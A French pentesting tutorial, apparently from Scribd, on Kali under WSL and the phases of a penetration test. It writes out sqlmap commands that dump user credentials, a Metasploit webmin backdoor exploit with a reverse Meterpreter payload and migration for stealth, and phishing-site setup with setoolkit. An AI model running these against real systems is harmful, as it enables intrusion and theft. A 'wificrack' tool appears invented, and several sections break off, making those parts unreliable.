0% ont trouvé ce document utile (0 vote)
20 vues22 pages

Phishing 101

Ce document présente une introduction complète à la cybersécurité, en abordant les concepts fondamentaux, les menaces, les acteurs, et les enjeux liés à ce domaine. Il détaille également l'installation et l'utilisation de Kali Linux, une distribution Linux spécialisée dans le test de pénétration, ainsi que les outils associés et les étapes d'un test de pénétration. Enfin, il aborde les aspects légaux de la cybersécurité, soulignant l'importance de respecter les lois et l'éthique professionnelle.

Transféré par

maurieladoukonou4
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
20 vues22 pages

Phishing 101

Ce document présente une introduction complète à la cybersécurité, en abordant les concepts fondamentaux, les menaces, les acteurs, et les enjeux liés à ce domaine. Il détaille également l'installation et l'utilisation de Kali Linux, une distribution Linux spécialisée dans le test de pénétration, ainsi que les outils associés et les étapes d'un test de pénétration. Enfin, il aborde les aspects légaux de la cybersécurité, soulignant l'importance de respecter les lois et l'éthique professionnelle.

Transféré par

maurieladoukonou4
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Sommaire:

Chapitre 1: La cybersécurité, c’est quoi?


Dans ce chapitre, vous allez découvrir les concepts de base de la cybersécurité, les types
de menaces, les acteurs et les enjeux. Vous allez aussi apprendre ce qu’est Kali Linux, une
distribution Linux spécialisée dans la sécurité informatique, et pourquoi elle est utilisée par
les professionnels du domaine.

1.1 Définition et objectifs de la cybersécurité


1.2 Les menaces et les vulnérabilités
1.3 Les acteurs et les motivations
1.4 Les enjeux et les défis
1.5 Kali Linux, qu’est-ce que c’est?
1.6 Les avantages et les limites de Kali Linux

Chapitre 2: Installer Kali Linux sous Windows


Dans ce chapitre, vous allez apprendre à installer le subsystem Kali Linux sous Windows,
une méthode qui vous permet d’utiliser les outils de Kali Linux sans quitter votre
environnement Windows. Vous allez aussi apprendre à configurer votre système et à le
mettre à jour.

2.1 Prérequis et matériel nécessaire


2.2 Activer le Sous-système Windows pour Linux (WSL)
2.3 Télécharger et installer Kali Linux depuis le Microsoft Store
2.4 Lancer et configurer Kali Linux
2.5 Installer les mises à jour et les outils de Kali Linux

Chapitre 3: Les outils de Kali Linux pour le test de pénétration


Dans ce chapitre, vous allez découvrir les principaux outils de Kali Linux pour réaliser un test
de pénétration, une méthode qui consiste à évaluer la sécurité d’un système informatique en
tentant de l’exploiter. Vous allez apprendre à utiliser des outils comme metasploit, nmap,
setoolkit, python3, pip3, etc.

3.1 Metasploit, le framework d’exploitation


3.2 Nmap, le scanner de ports
3.3 Setoolkit, le kit d’ingénierie sociale
3.4 Python3 et pip3, les outils de programmation
3.5 Autres outils utiles

Chapitre 4: Les étapes d’un test de pénétration


Dans ce chapitre, vous allez apprendre à suivre les différentes étapes d’un test de
pénétration, depuis la phase de reconnaissance jusqu’à la rédaction du rapport final. Vous
allez aussi apprendre à respecter les bonnes pratiques et à éviter les pièges.

4.1 La reconnaissance: collecter des informations sur la cible


4.2 Le scan: identifier les services et les vulnérabilités
4.3 L’exploitation: compromettre le système
4.4 La post-exploitation: maintenir l’accès et extraire des données
4.5 Le rapport: documenter les résultats et proposer des recommandations

Chapitre 5: Les aspects légaux de la cybersécurité


Dans ce chapitre, vous allez apprendre à connaître les aspects légaux de la cybersécurité,
c’est-à-dire les lois, les normes, l’éthique et la responsabilité qui encadrent l’activité des
professionnels du domaine. Vous allez aussi apprendre à respecter la législation en vigueur
et à protéger vos droits.

5.1 Les lois applicables à la cybersécurité


5.2 Les normes internationales et nationales
5.3 L’éthique professionnelle et personnelle
5.4 La responsabilité civile et pénale

Chapitre 1: La cybersécurité, c’est quoi?

1.1 Définition et objectifs de la cybersécurité

La cybersécurité est l’ensemble des moyens techniques, organisationnels et humains visant


à protéger les systèmes d’information contre les attaques malveillantes. Un système
d’information est un ensemble de ressources (matérielles, logicielles, humaines, etc.) qui
permettent de collecter, de traiter, de stocker et de diffuser des données et des services.

Les objectifs de la cybersécurité sont d’assurer la confidentialité, l’intégrité, la disponibilité et


la traçabilité des données et des services. La confidentialité consiste à empêcher l’accès
non autorisé aux données. L’intégrité consiste à garantir que les données ne sont pas
altérées ou détruites. La disponibilité consiste à assurer que les données et les services sont
accessibles en tout temps. La traçabilité consiste à pouvoir identifier l’origine et le parcours
des données.

La cybersécurité s’applique à de nombreux domaines d’activité qui dépendent des systèmes


d’information, tels que le e-commerce, la banque, la santé, la défense, etc. La cybersécurité
est donc un enjeu majeur pour la sécurité, la compétitivité et la confiance des individus et
des organisations.

1.2 Les menaces et les vulnérabilités


Les menaces sont les actions malveillantes qui visent à compromettre les systèmes
d’information. Il existe différents types de menaces, selon le mode d’attaque, le vecteur
d’infection ou le résultat recherché. Parmi les menaces les plus courantes, on peut citer:

Les virus: des programmes malveillants qui s’attachent à d’autres fichiers et qui se
propagent en infectant d’autres ordinateurs.
Les ransomware: des programmes malveillants qui chiffrent les données de la victime et qui
exigent une rançon pour les déchiffrer.
Le phishing: une technique qui consiste à envoyer des messages frauduleux (par e-mail,
SMS, etc.) pour inciter la victime à divulguer ses informations personnelles ou bancaires ou
à cliquer sur un lien malveillant.
Le déni de service: une technique qui consiste à saturer un serveur ou un réseau avec des
requêtes excessives pour le rendre indisponible.
Les vulnérabilités sont les failles ou les faiblesses dans les systèmes d’information qui
peuvent être exploitées par les attaquants. Il existe différents types de vulnérabilités, selon
leur origine, leur nature ou leur impact. Parmi les vulnérabilités les plus courantes, on peut
citer:

Les mots de passe faibles: des mots de passe trop simples, trop courts ou trop communs
qui peuvent être devinés ou craqués par les attaquants.
Les configurations erronées: des paramètres incorrects ou insuffisants qui peuvent laisser
des portes ouvertes aux attaquants.
Les logiciels obsolètes: des logiciels qui ne sont pas mis à jour régulièrement et qui peuvent
contenir des failles de sécurité connues et exploitables.

1.3 Les acteurs et les motivations

Les acteurs sont les personnes ou les entités impliquées dans la cybersécurité. Il existe
différents types d’acteurs, selon leur rôle, leur niveau de compétence ou leur affiliation.
Parmi les acteurs principaux, on peut citer:

Les attaquants: ceux qui lancent des attaques contre les systèmes d’information pour
diverses motivations.
Les victimes: ceux qui subissent les conséquences des attaques sur leurs systèmes
d’information.
Les défenseurs: ceux qui protègent les systèmes d’information contre les attaques en
mettant en place des mesures de sécurité.
Les autorités: ceux qui régulent et contrôlent l’activité de la cybersécurité en édictant des lois
et en sanctionnant les infractions.
Les motivations sont les raisons qui poussent les attaquants à agir. Il existe différentes
motivations, selon le bénéfice attendu, l’objectif visé ou l’idéologie partagée. Parmi les
motivations les plus fréquentes, on peut citer:

Le profit: la recherche d’un gain financier par le vol, l’extorsion ou la fraude.


L’espionnage: la recherche d’un avantage stratégique par la collecte d’informations
confidentielles ou sensibles.
Le sabotage: la recherche d’un dommage matériel ou moral par la destruction ou la
perturbation des systèmes d’information.
L’idéologie: la recherche d’un changement social ou politique par la diffusion d’un message
ou la contestation d’une autorité.
Le plaisir: la recherche d’un défi personnel ou d’une reconnaissance par la démonstration de
ses compétences ou de sa supériorité.

1.4 Les enjeux et les défis

Les enjeux sont les conséquences positives ou négatives de la cybersécurité sur les
individus et les organisations. Il existe différents types d’enjeux, selon le domaine concerné,
le niveau d’impact ou le degré d’urgence. Parmi les enjeux majeurs, on peut citer:

Les enjeux économiques: la cybersécurité peut générer des opportunités de croissance, de


compétitivité et d’innovation, mais aussi des risques de pertes financières, de concurrence
déloyale ou de vol de propriété intellectuelle.
Les enjeux stratégiques: la cybersécurité peut renforcer la sécurité nationale, la
souveraineté numérique et la coopération internationale, mais aussi provoquer des conflits,
des tensions ou des cyberattaques entre les États.
Les enjeux juridiques: la cybersécurité peut garantir le respect des droits, des obligations et
des responsabilités des acteurs, mais aussi poser des problèmes de régulation, de
conformité ou de sanction.
Les enjeux éthiques: la cybersécurité peut favoriser la confiance, la transparence et la
protection des données personnelles, mais aussi susciter des dilemmes, des controverses
ou des abus.
Les enjeux sociaux: la cybersécurité peut améliorer l’accès, l’éducation et l’inclusion
numérique, mais aussi engendrer des inégalités, des discriminations ou des exclusions.
Les défis sont les difficultés auxquelles fait face la cybersécurité pour atteindre ses objectifs.
Il existe différents types de défis, selon leur origine, leur nature ou leur complexité. Parmi les
défis majeurs, on peut citer:

L’évolution rapide des technologies: la cybersécurité doit s’adapter en permanence aux


nouvelles technologies qui peuvent offrir de nouvelles opportunités mais aussi de nouvelles
vulnérabilités.
La complexité des systèmes: la cybersécurité doit gérer des systèmes de plus en plus
interconnectés, hétérogènes et dynamiques qui peuvent augmenter les performances mais
aussi les risques.
La diversité des menaces: la cybersécurité doit faire face à des menaces de plus en plus
variées, sophistiquées et persistantes qui peuvent échapper aux détections ou aux
défenses.

Le manque de compétences: la cybersécurité doit pallier le manque de professionnels


qualifiés et sensibilisés qui peuvent assurer la sécurité des systèmes d’information.

1.5 Kali Linux, qu’est-ce que c’est ?

Kali Linux est une distribution Linux basée sur Debian et conçue pour la sécurité
informatique. Une distribution Linux est une version personnalisée du système d’exploitation
Linux qui regroupe un ensemble de logiciels adaptés à un usage spécifique. Kali Linux est
donc une distribution Linux spécialisée dans le test de pénétration.

Le test de pénétration est une méthode qui consiste à évaluer la sécurité d’un système
informatique en tentant de l’exploiter comme le ferait un hacker. Le test de pénétration
permet ainsi de détecter les vulnérabilités et de proposer des solutions pour les corriger.

Kali Linux est le successeur de BackTrack Linux, une distribution Linux créée en 2006 par
Offensive Security, une entreprise spécialisée dans la formation et le conseil en sécurité
informatique. Kali Linux a été lancée en 2013 avec une nouvelle architecture et une nouvelle
philosophie.

1.6 Les avantages et les limites de Kali Linux

Kali Linux présente de nombreux avantages pour la sécurité informatique, tels que:

Une distribution complète et à jour: Kali Linux regroupe plus de 600 outils préinstallés pour
le test de pénétration, couvrant tous les domaines de la sécurité informatique: analyse
réseau, audit web, exploitation, ingénierie sociale, etc. Kali Linux est aussi régulièrement
mise à jour pour intégrer les dernières nouveautés et corrections.
Une communauté active et réactive: Kali Linux bénéficie du soutien d’une large communauté
d’utilisateurs et de développeurs qui partagent leurs expériences, leurs conseils et leurs
contributions. Kali Linux dispose aussi d’un support officiel assuré par Offensive Security qui
propose des formations, des certifications et des services professionnels.
Une documentation riche et accessible: Kali Linux dispose d’une documentation complète et
détaillée qui explique le fonctionnement, l’utilisation et la personnalisation de la distribution.
Kali Linux propose aussi des tutoriels, des livres et des vidéos pour apprendre à maîtriser
les outils et les techniques de la sécurité informatique.

Kali Linux présente aussi quelques limites qu’il faut connaître et respecter, telles que:

Une distribution qui nécessite des connaissances avancées en Linux: Kali Linux est une
distribution qui s’adresse principalement aux professionnels ou aux passionnés de la
sécurité informatique qui ont déjà une bonne maîtrise du système Linux. Kali Linux n’est pas
une distribution facile à prendre en main pour les débutants ou les utilisateurs occasionnels.
Une distribution qui n’est pas adaptée à un usage quotidien: Kali Linux est une distribution
qui est optimisée pour le test de pénétration, ce qui implique certains compromis au niveau
de la stabilité, de la compatibilité ou de la sécurité. Kali Linux n’est pas une distribution qui
est conçue pour être utilisée comme un système principal ou pour réaliser des tâches
courantes comme la navigation web, le traitement de texte ou le multimédia.
Une distribution qui peut être détournée à des fins malveillantes: Kali Linux est une
distribution qui offre des outils puissants et dangereux qui peuvent être utilisés pour attaquer
ou compromettre des systèmes d’information. Kali Linux n’est pas une distribution qui est
destinée à être utilisée à des fins illégales ou immorales. Les utilisateurs de Kali Linux
doivent respecter la législation en vigueur et l’éthique professionnelle.
Chapitre 2: Installer Kali Linux sous Windows

2.1 Prérequis et matériel nécessaire

Pour installer Kali Linux sous Windows, vous devez disposer des éléments suivants:

Un ordinateur sous Windows 10 versions 2004 et ultérieures (build 19041 et versions


ultérieures) ou Windows 11. Si vous utilisez des versions antérieures, consultez la page
d’installation manuelle de WSL.
Une connexion Internet pour télécharger les fichiers nécessaires.
Un espace disque suffisant pour accueillir la distribution Kali Linux (environ 4 Go).

2.2 Activer le Sous-système Windows pour Linux (WSL)

Le Sous-système Windows pour Linux (WSL) est une fonctionnalité qui permet d’exécuter
des applications, des utilitaires et des outils en ligne de commande Bash Linux directement
sur Windows, sans modification, sans devoir passer par une machine virtuelle traditionnelle
ou une configuration à double démarrage.

Pour activer WSL, vous devez suivre les étapes suivantes:

Ouvrez l’invite de commandes PowerShell ou Windows en mode administrateur en cliquant


avec le bouton droit et en sélectionnant « Exécuter en tant qu’administrateur ».
Entrez la commande suivante et validez par Entrée:

wsl --install

Redémarrez votre ordinateur.


Cette commande active les fonctionnalités nécessaires pour exécuter WSL et installe la
distribution Ubuntu de Linux par défaut. Vous pouvez changer la distribution installée à l’aide
de l’indicateur -d.

2.3 Télécharger et installer Kali Linux depuis le Microsoft Store

Une fois que WSL est activé, vous pouvez télécharger et installer Kali Linux depuis le
Microsoft Store. Pour ce faire, suivez les étapes suivantes:

Ouvrez le Microsoft Store à partir du menu Démarrer.


Cherchez “Kali Linux” puis installez-le en cliquant sur “Obtenir” puis sur “Installer”.
Lancez Kali Linux à partir du menu Démarrer ou du raccourci créé sur le bureau.
La première fois que vous lancez Kali Linux, une fenêtre de console s’ouvre et vous êtes
invité à attendre que les fichiers soient décompressés et stockés sur votre ordinateur. Tous
les lancements ultérieurs doivent prendre moins d’une seconde.

2.4 Lancer et configurer Kali Linux


Lors du premier lancement de Kali Linux, vous devez configurer votre nom d’utilisateur et
votre mot de passe. Pour ce faire, suivez les instructions qui s’affichent à l’écran. Rien ne
s’affiche lorsque vous tapez votre mot de passe, c’est normal.

Une fois que vous avez configuré votre compte, vous pouvez accéder au shell Bash de Kali
Linux et exécuter les commandes que vous souhaitez. Vous pouvez aussi utiliser le menu
déroulant de Windows Terminal pour lancer Kali Linux.

2.5 Installer les mises à jour et les outils de Kali Linux

Par défaut, la version de Kali Linux installée depuis le Microsoft Store est minimale et ne
contient pas tous les outils de sécurité informatique. Pour installer les mises à jour et les
outils de Kali Linux, vous devez suivre les étapes suivantes:

Ouvrez le shell Bash de Kali Linux.


Entrez la commande suivante pour mettre à jour la liste des paquets disponibles:

sudo apt update

Entrez la commande suivante pour mettre à jour les paquets installés:

sudo apt upgrade

Entrez la commande suivante pour installer tous les outils de Kali Linux:

sudo apt install kali-linux-everything

Cette dernière commande peut prendre du temps et nécessiter beaucoup d’espace disque.
Vous pouvez aussi choisir d’installer seulement les outils qui vous intéressent en remplaçant
kali-linux-everything par le nom du métapaquet correspondant. Par exemple, pour installer
les outils liés au test de pénétration web, vous pouvez entrer:

sudo apt install kali-linux-web

Vous pouvez consulter la liste des métapaquets disponibles sur le site officiel de Kali Linux.

Voici quelques exemples d’utilisation des outils de Kali Linux sous Windows:

Pour scanner les ports ouverts d’une machine sur le réseau local, vous pouvez utiliser l’outil
nmap en entrant:

nmap -sV [Link]

Pour tester la vulnérabilité d’un site web à une injection SQL, vous pouvez utiliser l’outil
sqlmap en entrant:

sqlmap -u [Link]
Pour créer un faux site web pour piéger les utilisateurs, vous pouvez utiliser l’outil setoolkit
en entrant: setoolkit puis en suivant le menu interactif.

Chapitre 3: Utiliser les outils de Kali Linux sous Windows

3.1 Présentation des outils de Kali Linux

Kali Linux est une distribution Linux spécialisée dans la sécurité informatique qui regroupe
plus de 600 outils préinstallés pour le test de pénétration. Le test de pénétration est une
méthode qui consiste à évaluer la sécurité d’un système informatique en tentant de
l’exploiter comme le ferait un attaquant. Le test de pénétration permet ainsi de détecter les
vulnérabilités et de proposer des solutions pour les corriger.

Les outils de Kali Linux couvrent tous les domaines de la sécurité informatique, tels que:

L’analyse réseau: pour scanner, surveiller et analyser le trafic réseau. Exemples d’outils:
nmap, wireshark, tcpdump, etc.
L’audit web: pour tester la sécurité des applications web et des serveurs web. Exemples
d’outils: sqlmap, nikto, burpsuite, etc.
L’exploitation: pour exploiter les vulnérabilités et prendre le contrôle des systèmes cibles.
Exemples d’outils: metasploit, armitage, ncat, etc.
L’ingénierie sociale: pour manipuler ou tromper les utilisateurs ou les systèmes. Exemples
d’outils: setoolkit, hydra, john the ripper, etc.
Le cracking: pour casser les mots de passe ou les clés de chiffrement. Exemples d’outils:
hashcat, aircrack-ng, ophcrack, etc.
Le forensics: pour analyser les traces laissées par les attaquants ou les victimes. Exemples
d’outils: autopsy, volatility, sleuthkit, etc.
Le reverse engineering: pour analyser le fonctionnement interne des programmes ou des
fichiers malveillants. Exemples d’outils: radare2, gdb, ollydbg, etc.
Vous pouvez consulter la liste complète des outils disponibles sur le site officiel de Kali
Linux.

3.2 Choisir les outils adaptés à ses besoins

Pour utiliser efficacement les outils de Kali Linux sous Windows, il faut d’abord choisir les
outils adaptés à ses besoins et à ses objectifs. Il n’existe pas de règle universelle pour
choisir les outils, mais il existe quelques critères qui peuvent vous aider à faire votre choix:

Le type de système cible: selon que vous voulez tester la sécurité d’un réseau local, d’un
site web, d’un ordinateur ou d’un smartphone, vous n’utiliserez pas les mêmes outils ni les
mêmes techniques.
Le niveau de connaissance du système cible: selon que vous disposez ou non
d’informations préalables sur le système cible (adresse IP, nom de domaine, système
d’exploitation, services actifs, etc.), vous devrez effectuer plus ou moins d’étapes
préliminaires pour identifier le système cible et ses vulnérabilités potentielles.
Le niveau de difficulté du test: selon que vous voulez réaliser un test simple ou complexe,
vous devrez utiliser des outils plus ou moins avancés et maîtriser plus ou moins de concepts
et de techniques de sécurité informatique.
Le niveau de discrétion du test: selon que vous voulez réaliser un test discret ou visible,
vous devrez utiliser des outils plus ou moins furtifs et éviter de laisser des traces ou des
indices de votre présence.
Par exemple, si vous voulez tester la sécurité d’un site web dont vous connaissez le nom de
domaine, vous pouvez utiliser les outils suivants:

nmap: pour scanner les ports ouverts du serveur web et identifier les services actifs.
nikto: pour détecter les vulnérabilités communes du serveur web et des applications web.
sqlmap: pour tester la vulnérabilité à une injection SQL des applications web qui utilisent une
base de données.
metasploit: pour exploiter les vulnérabilités trouvées et prendre le contrôle du serveur web.

3.3 Configurer et utiliser les outils de Kali Linux sous Windows

Pour configurer et utiliser les outils de Kali Linux sous Windows, il faut suivre les étapes
suivantes:

Ouvrir le shell Bash de Kali Linux à partir du menu Démarrer, du raccourci sur le bureau ou
du menu déroulant de Windows Terminal.
Entrer la commande sudo apt update pour mettre à jour la liste des paquets disponibles.
Entrer la commande

sudo apt install <nom du paquet>

pour installer l’outil souhaité. Par exemple, pour installer nmap, entrer:

sudo apt install nmap

Entrer la commande <nom de l'outil> <options> <arguments> pour utiliser l’outil. Par
exemple, pour scanner les ports ouverts d’une machine sur le réseau local, entrer:

nmap -sV [Link]

Vous pouvez consulter la documentation ou l’aide en ligne de chaque outil pour connaître
les options et les arguments disponibles. Vous pouvez aussi utiliser la commande man
<nom de l'outil> pour afficher le manuel de l’outil.

Voici quelques exemples d’utilisation des outils de Kali Linux sous Windows:

3.3.1 Gobuster

Gobuster est un outil qui permet de faire le bruteforce des répertoires et fichiers d’un site
web, des sous domaines d’un domaine principal, des hôtes virtuels d’un serveur web et des
buckets Amazon ouverts.
Pour installer gobuster, entrer:

sudo apt install gobuster

Pour utiliser gobuster, entrer:

gobuster <mode> <options>

Le mode peut être:

dir: pour le bruteforce des répertoires et fichiers


dns: pour le bruteforce des sous domaines
s3: pour le bruteforce des buckets Amazon
vhost: pour le bruteforce des hôtes virtuels

Les options peuvent être:

-u: pour spécifier l’URL cible


-w: pour spécifier le chemin du wordlist à utiliser
-x: pour spécifier les extensions à tester
-s: pour filtrer les résultats selon les codes de réponse HTTP
-k: pour ignorer la vérification du certificat SSL
-t: pour augmenter le nombre de threads
-o: pour exporter les résultats dans un fichier

Par exemple, pour faire le bruteforce des répertoires et fichiers d’un site web avec des
extensions php et html, entrer:

gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link] -x php,html

3.3.2 John the Ripper

John the Ripper est un outil qui permet de casser les mots de passe en utilisant des
attaques par dictionnaire ou par bruteforce.

Pour installer john the ripper, entrer:

sudo apt install john

Pour utiliser john the ripper, entrer:

john <options> <fichier>

Le fichier doit contenir les mots de passe hachés à casser.

Les options peuvent être:


–wordlist: pour spécifier le chemin du wordlist à utiliser
–format: pour spécifier le format du hachage à casser
–show: pour afficher les mots de passe cassés
–rules: pour appliquer des règles de transformation aux mots du wordlist
–incremental: pour activer le mode bruteforce

Par exemple, pour casser les mots de passe hachés au format LM dans le fichier [Link]
en utilisant le wordlist [Link], entrer:

john --wordlist=/usr/share/wordlists/[Link] --format=LM [Link]

3.3.3 Wificrack

Wificrack est un outil qui permet de casser les clés de chiffrement des réseaux wifi en
utilisant des attaques par dictionnaire ou par bruteforce.

Pour installer wificrack, entrer:

sudo apt install wificrack

Pour utiliser wificrack, entrer: wificrack <options>

Les options peuvent être:

-i: pour spécifier l’interface wifi à utiliser


-s: pour scanner les réseaux wifi disponibles
-b: pour spécifier l’adresse MAC du réseau wifi cible
-c: pour capturer les paquets du réseau wifi cible
-w: pour spécifier le chemin du wordlist à utiliser
-a: pour spécifier l’algorithme de chiffrement à casser (WEP ou WPA)
Par exemple, pour casser la clé WPA

Chapitre 4: Les étapes d’un test de pénétration


Dans ce chapitre, vous allez apprendre à suivre les différentes étapes d’un test de
pénétration, depuis la phase de reconnaissance jusqu’à la rédaction du rapport final. Vous
allez aussi apprendre à respecter les bonnes pratiques et à éviter les pièges.

4.1 La reconnaissance: collecter des informations sur la cible

La reconnaissance est la première étape d’un test de pénétration. Elle consiste à collecter
un maximum d’informations sur la cible, qu’il s’agisse d’une personne, d’une organisation ou
d’un système informatique. L’objectif est de découvrir les points faibles, les failles de sécurité
et les opportunités d’attaque.

Il existe deux types de reconnaissance: la reconnaissance passive et la reconnaissance


active. La reconnaissance passive consiste à utiliser des sources d’information publiques,
sans interagir directement avec la cible. Par exemple, on peut consulter les réseaux sociaux,
les moteurs de recherche, les annuaires, les registres de noms de domaine, etc. La
reconnaissance active consiste à envoyer des requêtes ou des paquets à la cible, afin
d’obtenir des informations plus précises et plus détaillées. Par exemple, on peut utiliser des
outils comme ping, traceroute, nmap, etc.

Imaginons que vous ayez pour cible une entreprise nommée IT-Connect, qui propose des
services informatiques.

Un exemple de reconnaissance passive est de rechercher le nom de l’entreprise sur Google,


afin de trouver son site web, ses employés, ses partenaires, ses produits, etc. Vous pouvez
ainsi obtenir des informations sur le domaine de l’entreprise ([Link]), son adresse (10
rue du commerce 75015 Paris), son numéro de téléphone (01 23 45 67 89), son activité
(formation, audit, conseil), etc.

Un autre exemple de reconnaissance passive est d’utiliser l’outil theHarvester, disponible sur
Kali Linux, qui permet de collecter des informations sur les noms de domaine, les adresses
e-mail et les sous-domaines associés à une cible. Par exemple, vous pouvez lancer la
commande suivante:

theHarvester -d [Link] -b google

Cette commande va rechercher sur Google les informations relatives au domaine


[Link]. Vous pouvez ainsi obtenir des informations sur les adresses e-mail des
employés (contact@[Link], admin@[Link], etc.), les sous-domaines du site web
([Link], [Link], etc.), les réseaux sociaux associés (Facebook, Twitter,
LinkedIn, etc.), etc.

Un exemple de reconnaissance active est de scanner le site web de l’entreprise avec nmap,
afin de détecter les ports ouverts, les services en cours d’exécution, les versions des
logiciels, etc. Par exemple, vous pouvez lancer la commande suivante:

nmap -v -A -sV [Link]

Cette commande va scanner le site web [Link] en mode verbose ( -v ), en


activant la détection du système d’exploitation, la détection de version, le scan de scripts et
le traceroute ( -A ), avec la détection de version ( -sV ).

Vous pouvez ainsi obtenir des informations sur le système d’exploitation du serveur web
(Linux), le port ouvert (80/tcp), le service en cours d’exécution (Apache), la version du
logiciel (2.4.38), les scripts NSE applicables ([Link], http-title, etc.), etc.

Un autre exemple de reconnaissance active est d’utiliser l’outil dnsenum, disponible sur Kali
Linux, qui permet de réaliser une énumération DNS sur une cible. Par exemple, vous
pouvez lancer la commande suivante:

dnsenum --enum [Link]


Cette commande va effectuer une énumération DNS sur le domaine [Link] et afficher
les résultats.

Vous pouvez ainsi obtenir des informations sur les serveurs DNS du domaine
([Link], [Link]), les enregistrements A du domaine ([Link] ->
[Link]), les enregistrements MX du domaine ([Link] -> [Link]), les
enregistrements NS du domaine ([Link] -> [Link]), etc.

4.2 Le scan: identifier les services et les vulnérabilités

Le scan est la deuxième étape d’un test de pénétration. Elle consiste à analyser la cible, afin
d’identifier les services et les vulnérabilités présents sur les ports ouverts. L’objectif est de
déterminer les vecteurs d’attaque potentiels et de choisir les exploits adaptés.

Il existe plusieurs types de scan, selon le niveau de détail et de discrétion souhaités. Par
exemple, on peut réaliser un scan SYN, un scan ACK, un scan XMAS, un scan FIN, etc. On
peut aussi réaliser un scan UDP, un scan ICMP, un scan ARP, etc.

Imaginons que vous ayez réussi à reconnaître une cible sur le réseau, par exemple une
machine ayant l’adresse IP [Link].

Un exemple de scan est d’utiliser l’outil nmap, disponible sur Kali Linux, qui permet de
réaliser des scans TCP et UDP sur une cible. Par exemple, vous pouvez lancer la
commande suivante:

nmap -v -A -sV [Link]

Cette commande va scanner le port [Link] en mode verbose ( -v ), en activant la


détection du système d’exploitation, la détection de version, le scan de scripts et le
traceroute ( -A ), avec la détection de version ( -sV ).

Vous pouvez ainsi obtenir des informations sur les ports ouverts, les services en cours
d’exécution, les versions des logiciels, les scripts NSE applicables, etc.

Un autre exemple de scan est d’utiliser l’outil arp-scan, disponible sur Kali Linux, qui permet
de réaliser des scans ARP sur le réseau local. Par exemple, vous pouvez lancer la
commande suivante:

arp-scan -l

Cette commande va scanner le réseau local en utilisant les informations de l’interface


réseau principale ( -l ).

Vous pouvez ainsi obtenir des informations sur les adresses IP et MAC des machines
présentes sur le réseau local.

4.3 L’exploitation: compromettre le système


L’exploitation est la troisième étape d’un test de pénétration. Elle consiste à utiliser les
vulnérabilités découvertes lors du scan, afin de compromettre le système cible. L’objectif est
de gagner un accès, de contourner les mécanismes de sécurité, ou de réaliser une action
malveillante.

Il existe plusieurs types d’exploitation, selon le type de vulnérabilité et le niveau d’accès visé.
Par exemple, on peut réaliser une injection SQL, un débordement de tampon, une élévation
de privilèges, un déni de service, etc.

Imaginons que vous ayez réussi à scanner un serveur web Linux hébergeant un forum.
Vous avez détecté une vulnérabilité SQLi sur la page de connexion du forum.

Un exemple d’exploitation est d’utiliser l’outil sqlmap, disponible sur Kali Linux, qui permet
de réaliser des injections SQL sur une cible. Par exemple, vous pouvez lancer la commande
suivante:

sqlmap -u [Link] --data="username=test&password=test" --dbs

Cette commande va tester la page de connexion du forum avec les paramètres username et
password, et afficher les noms des bases de données présentes sur le serveur web.

Vous pouvez ensuite choisir une base de données à exploiter, par exemple la base forum
qui contient les informations des utilisateurs du forum.

sqlmap -u [Link] --data="username=test&password=test" -D forum


--tables

Cette commande va afficher les noms des tables présentes dans la base forum.

Vous pouvez ensuite choisir une table à exploiter, par exemple la table users qui contient les
noms, les mots de passe et les adresses e-mail des utilisateurs du forum.

sqlmap -u [Link] --data="username=test&password=test" -D forum


-T users --columns

Cette commande va afficher les noms des colonnes présentes dans la table users.

Vous pouvez ensuite choisir les colonnes à extraire, par exemple les colonnes username,
password et email.

sqlmap -u [Link] --data="username=test&password=test" -D forum


-T users -C username,password,email --dump

Cette commande va extraire les valeurs des colonnes username, password et email de la
table users et les afficher.
Un autre exemple d’exploitation est d’utiliser l’outil Metasploit, disponible sur Kali Linux, qui
permet de lancer des exploits préconfigurés sur une cible. Par exemple, vous pouvez lancer
la commande suivante:

msfconsole

Cette commande va ouvrir l’interface du framework Metasploit, qui permet de choisir un


exploit, un payload, une cible et des options.

Vous pouvez ensuite rechercher un exploit adapté à votre cible, par exemple l’exploit
linux/http/webmin_backdoor qui exploite une porte dérobée dans le logiciel Webmin installé
sur le serveur web.

search webmin

use exploit/linux/http/webmin_backdoor

Ces commandes vont rechercher et charger l’exploit webmin_backdoor.

Vous pouvez ensuite configurer l’exploit avec l’adresse IP du serveur web (RHOSTS), le port
du service Webmin (RPORT) et le payload à exécuter (PAYLOAD).

set RHOSTS [Link]

set RPORT 10000

set PAYLOAD linux/x86/meterpreter/reverse_tcp

Ces commandes vont configurer l’exploit avec les paramètres souhaités.

Vous pouvez ensuite lancer l’exploit et obtenir une session Meterpreter sur le serveur web.

run

Cette commande va lancer l’exploit et ouvrir une session Meterpreter.

4.4 La post-exploitation: maintenir l’accès et extraire des données

La post-exploitation est la quatrième étape d’un test de pénétration. Elle consiste à utiliser le
système compromis, afin de maintenir l’accès et d’extraire des données utiles ou sensibles.
L’objectif est de consolider sa position, de se déplacer latéralement sur le réseau, ou de
réaliser une action finale.

Il existe plusieurs types de post-exploitation, selon le type de système et le niveau d’accès


obtenus. Par exemple, on peut réaliser une élévation de privilèges, une persistance, un
pillage de données, un exfiltration, etc.
Imaginons que vous ayez réussi à exploiter une vulnérabilité sur un serveur web Windows
hébergeant un site e-commerce. Vous avez obtenu une session Meterpreter sur le serveur,
qui vous permet d’exécuter des commandes à distance.

Un exemple de post-exploitation est d’utiliser l’outil Metasploit, disponible sur Kali Linux, qui
permet de lancer des modules post-exploitation sur une cible. Par exemple, vous pouvez
lancer la commande suivante:

use post/windows/manage/migrate

Cette commande va charger le module migrate, qui permet de migrer la session Meterpreter
vers un autre processus sur la cible. Cela vous permet de dissimuler votre présence et de
survivre à un redémarrage du serveur web. Vous pouvez ensuite choisir le processus vers
lequel vous voulez migrer, par exemple le processus [Link] qui correspond à
l’interface graphique du système.

set SESSION 1

set PID 1234

run

Ces commandes vont migrer la session 1 (votre session Meterpreter) vers le processus
1234 ([Link]).

Un autre exemple de post-exploitation est d’utiliser l’outil weevely, disponible sur Kali Linux,
